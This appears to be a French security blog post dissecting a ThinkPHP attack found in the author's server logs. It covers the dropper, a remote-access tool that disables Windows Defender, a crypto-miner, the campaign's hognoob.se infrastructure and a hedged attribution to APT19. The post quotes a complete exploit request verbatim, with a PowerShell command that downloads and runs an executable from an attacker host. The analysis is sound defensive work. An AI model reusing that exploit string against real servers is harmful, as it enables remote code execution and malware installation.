Dissection d’une attaque de masse chinoise

Bonjour tout le monde !

Comme vous le savez peut-être, je ne plaisante pas avec la sécurité. Ce qui induit par conséquent que je ne plaisante pas avec celle du blog. Ce faisant, une bonne façon de veiller à la sécurité de ses équipements est d’éplucher périodiquement les logs des services actifs. Ici je vais me pencher uniquement sur les logs HTTP.

1°) Le Contexte

Il y a quelques jours donc, je regardais attentivement le fichier de logs et je constatais à ma grande surprise que plus de 50% des requêtes avaient la forme d’attaques de masses, faites, donc par des hôtes en scannant internet pour déceler des serveurs vulnérables à certains types d’attaques.

J’avais déjà l’habitude de ce genre d’attaques de masses, très peu sophistiquées et dont les bonnes pratiques permettent largement de s’en tirer indemne.

Cependant je n’ai pas pu m’empêcher de constater une requête, ponctuelle, très ciblée, et pour le moins sophistiquée:

 124.161.103.251 - - [02/Apr/2019:17:17:41 +0200] "GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/fbouucstzfhszdw10280.exe');start%20C:/Windows/temp/fbouucstzfhszdw10280.exe HTTP/1.1" 301 5 "/public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/fbouucstzfhszdw10280.exe');start C:/Windows/temp/fbouucstzfhszdw10280.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Pour faire simple, une commande powershell qui vise à télécharger un fichier exécutable et à l’exécuter est injectée dans le fichier “index.php”, ce qui a pour but de causer l’exécution de cette commande par le système.

Après vérification, il s’agirait d’une démonstration d’attaque contre “ThinkPHP”, un framework de développement d’applications Web basé sur PHP et distribué sous la licence open source Apache2. Il serait très populaire en Chine, où plus de 40 000 serveurs exécutent ThinkPHP (source)

Très curieux, et passionné par ce genre de mystères d’internet, je télécharge le fichier exécutable et je me mets donc à table (façon de parler) 🙂 .

2°) Le Dropper

Premièrement, le fichier n’est pas lourd du tout (seulement 90 ko) ce qui nous mène à supposer qu’il ne s’agisse là que d’un dropper qui ne téléchargera la charge utile qu’après execution. Ce genre de procédé est largement répandu pour faciliter et contrôler l’execution du “vrai” virus.

Ce que je peux dire à ce stade, c’est que la ou les personnes qui ont écrit cette pièce de code ne sont pas du tout débutantes. En effet, même si je sais que le programme a été écrit en C++ en regardant quelles bibliothèques sont chargées, je ne peux rien dire d’autre sur le contexte d’écriture. Il n’y a par exemple aucun artéfact de déboguage, aucun commentaire, rien du tout à part le programme en question. Ce qui est assez rare pour le souligner.

Ce fichier passe donc le 6ème point du fameux Development Tradecraft de la CIA qui est:

Raise the difficulty for analysis and reverse-engineering, and removes artifacts used for attribution/origination.

3°) La charge utile

Pendant l’execution, deux autres fichiers sont successivements téléchargés et exécutés: nmbsawer.exe et wercplshost.exe.
L’un fourni un accès à distance (cmd.exe) persistant tout en désactivant la protection Windows Defender et l’autre fourni un mineur cryptoactif. J’ai d’ailleurs pu identifier le pool de minage grâce à un fichier de configuration: pxi.hognoob.se:35791. Le mineur est configuré pour utiliser 1% de la charge CPU.

Ça a l’air de rien comme ça, mais sur des serveurs avec des processeurs Xéon 64 coeurs 1% ce n’est pas rien !

En tout, il y a 6 sous domaines impliqués dans cette opération:

upa1.hognoob.se 195.128.127.254 ----> composants additionnels téléchargés par le dropper (SERVEUR A)
upa2.hognoob.se 195.128.127.254 ----> composants additionnels téléchargés par le dropper (SERVEUR A)
q1a.hognoob.se  195.128.127.254 ----> composants additionnels téléchargés par le dropper (SERVEUR A)
uio.hognoob.se  195.128.126.120 ----> ??? (SERVEUR C)
fid.hognoob.se   195.128.127.254 ----> téléchargement initial du dropper (SERVEUR A)
pxi.hognoob.se  195.128.124.140 ----> pool de minage (SERVEUR B)

Note interessante, certains sous-domaines sont protégés derrière Cloudflare. Enfin “protégé” car cette “protection” m’a permis d’avoir les adressse IP des sous-domaines sans aucun soucis.

Lorsqu’on a toutes les adresses IP (qui sont au nombre de trois) de tout les sous-domaines impliqués, on se rend compte très vite que toutes les adresses contactées sont identifiées en Russie. Tous à l’exception d’une seule:

http://2019.ip138.com/ic.asp 117.25.157.119 ----> Contrôle et Commande (SERVEUR D)

Cette adresse web est codée en dur dans un composant additionnel de surveillance téléchargé par le dropper. Ce qui laisse supposer qu’il s’agisse là de l’adresse du serveur de Contrôle et de Commande qui lui serait basé en Chine. De plus, l’extension “asp” conforte l’hypothèse d’un contrôle Web sur le botnet.

On remarquera par ailleurs le nom du sous-domaine en “2019”. En faisant quelques recherches j’ai constaté que chaque opération avait son sous-domaine en fonction de l’année. Le plus vieux que j’ai pu trouver remontant à 2017.

Verdict

Même si rien ne nous permet de dire qu’il s’agisse bien là d’une attaque orchestrée par des pirates russes, il est évident que la plupart des infrastructures supportant l’opération se trouvent, elles, en Russie.

Le point intriguant dans tout ceci c’est que le plus gros bénéfice de l’opération se trouve en Chine et comme par hasard un serveur vital de l’opération se trouve être lui aussi en Chine.

Ce point est d’autant plus intriguant lorsque l’on sait que le domaine serait attribué à APT 19. Aussi connue sous le doux nom de “Codoso Team” ou encore “Sunshop Group”. Il s’agirait d’un groupe de hackers indépendants qui bénéficieraient d’une certaine forme d’appui de la part du gouvernement chinois (source)

En bref, voilà où m’a mené ma petite enquête pour en apprendre un peu plus sur ces pirates de l’ombre qui font tant parler d’eux, et sur qui, paradoxalement, on connait peu de choses.

J’espère que cet article vous a plu, n’hésitez pas à m’envoyer des messages via le formulaire de contact ou même en commentaire pour me donner votre point de vue, ou si vous avez connu la même situation / une situation similaire, je les lirais tous ! 🙂

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*
*